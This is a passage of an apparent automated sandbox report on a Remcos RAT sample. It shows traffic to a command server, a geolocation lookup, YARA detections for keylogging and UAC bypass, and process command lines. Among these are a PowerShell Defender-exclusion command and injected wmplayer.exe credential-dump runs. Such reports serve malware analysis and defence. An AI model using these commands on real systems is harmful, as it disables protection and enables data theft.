                                                                                          Dec 8, 2024 08:42:13.785892963 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.785945892 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.786189079 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.786941051 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.787039042 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.787095070 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.787961006 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.788019896 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.788110971 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.789020061 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.789064884 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.789074898 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.790050983 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.790098906 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.790169954 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.791090965 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.791143894 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.791178942 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.792196989 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.792246103 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.792283058 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.793155909 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.793199062 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.793288946 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.794213057 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.794256926 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.794271946 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.795344114 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.795445919 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.795500040 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.796281099 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.796334028 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.796371937 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.797363997 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.797657013 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.797722101 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.798365116 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.798445940 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.798538923 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.799441099 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.799509048 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.799563885 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.800411940 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.800470114 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.800527096 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.801476002 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.801486969 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.801539898 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.802558899 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.802645922 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.802700043 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.803538084 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.803591967 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.803692102 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.804588079 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.804718971 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.804749012 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.805613995 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.805660963 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.805696964 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.806643963 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.806746960 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.806809902 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.807677031 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.807764053 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:13.807775021 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:13.888298988 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:14.380697966 CET8049720178.237.33.50192.168.2.5
                                                                                          Dec 8, 2024 08:42:14.384546995 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:42:16.127007008 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246577024 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246644020 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246644974 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246656895 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246707916 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246718884 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246731043 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246742010 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246773005 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.246869087 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.246881008 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.247016907 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.247028112 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.259910107 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:16.366075039 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366094112 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366106033 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366131067 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366221905 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366287947 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.366332054 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.379724026 CET367849719192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:16.379784107 CET497193678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:43.778378010 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:42:43.780505896 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:42:43.899821997 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:13.861892939 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:13.863271952 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:43:13.982589006 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:44.138871908 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:43:44.140862942 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:43:44.260226011 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:01.783987999 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:02.091687918 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:02.888544083 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:04.185414076 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:06.685431004 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:11.576071978 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:14.205920935 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:14.211265087 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:44:14.330497026 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:21.185501099 CET4972080192.168.2.5178.237.33.50
                                                                                          Dec 8, 2024 08:44:44.225899935 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:44:44.227452040 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:44:44.346939087 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:14.319226027 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:14.323569059 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:45:14.442903042 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:44.440757990 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:45:44.442622900 CET497173678192.168.2.5192.210.150.26
                                                                                          Dec 8, 2024 08:45:44.562103987 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:46:14.509273052 CET367849717192.210.150.26192.168.2.5
                                                                                          Dec 8, 2024 08:46:14.561038971 CET497173678192.168.2.5192.210.150.26

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 8, 2024 08:42:11.865493059 CET6167553192.168.2.51.1.1.1
                                                                                          Dec 8, 2024 08:42:12.004793882 CET53616751.1.1.1192.168.2.5

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 8, 2024 08:42:11.865493059 CET192.168.2.51.1.1.10x85a7Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 8, 2024 08:42:12.004793882 CET1.1.1.1192.168.2.50x85a7No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • geoplugin.net

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549720178.237.33.50807172C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 8, 2024 08:42:12.135351896 CET71OUTGET /json.gp HTTP/1.1
                                                                                          Host: geoplugin.net
                                                                                          Cache-Control: no-cache
                                                                                          Dec 8, 2024 08:42:13.381409883 CET1171INHTTP/1.1 200 OK
                                                                                          date: Sun, 08 Dec 2024 07:42:13 GMT
                                                                                          server: Apache
                                                                                          content-length: 963
                                                                                          content-type: application/json; charset=utf-8
                                                                                          cache-control: public, max-age=300
                                                                                          access-control-allow-origin: *
                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:02:42:06
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Users\user\Desktop\IB9876789000.bat.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\IB9876789000.bat.exe"
                                                                                          Imagebase:0x2437ebc0000
                                                                                          File size:851'968 bytes
                                                                                          MD5 hash:F443C222255E35EE6DD0E194360C23CE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:02:42:06
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:02:42:08
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                                                                                          Imagebase:0x7ff7be880000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:02:42:08
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\regedit.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Windows\regedit.exe"
                                                                                          Imagebase:
                                                                                          File size:370'176 bytes
                                                                                          MD5 hash:999A30979F6195BF562068639FFC4426
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                                                                                          Imagebase:
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:02:42:09
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600
                                                                                          Imagebase:0x7ff6a3c20000
                                                                                          File size:570'736 bytes
                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:02:42:12
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:02:42:13
                                                                                          Start date:08/12/2024
                                                                                          Path:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"
                                                                                          Imagebase:0xf70000
                                                                                          File size:166'912 bytes
                                                                                          MD5 hash:A7790328035BBFCF041A6D815F9C28DF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:15.7%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:6
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 8216 7ff848b60c61 8217 7ff848b60c6f FreeConsole 8216->8217 8219 7ff848b60d2e 8217->8219 8220 7ff848b61a22 8221 7ff848b61a31 VirtualProtect 8220->8221 8223 7ff848b61b12 8221->8223

                                                                                            Executed Functions

                                                                                            Function 00007FF848B62A2C Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2246023822.00007FF848B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848b60000_IB9876789000.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: fish
                                                                                            • API String ID: 0-1064584243
                                                                                            • Opcode ID: e7f8aaaef9f76bac35ada08cad135e719d18124abe0ab56047ae2c0c5cab8b0b
                                                                                            • Instruction ID: 421f41c332bd917fc72efaa8723a2cbb0207760c365d96d7a770e18a9812b641
                                                                                            • Opcode Fuzzy Hash: e7f8aaaef9f76bac35ada08cad135e719d18124abe0ab56047ae2c0c5cab8b0b
                                                                                            • Instruction Fuzzy Hash: 5AD14931A1CA8A0FE75DBB3898551B577E1FF96350F0441BED48BC36D3DE28A8068786
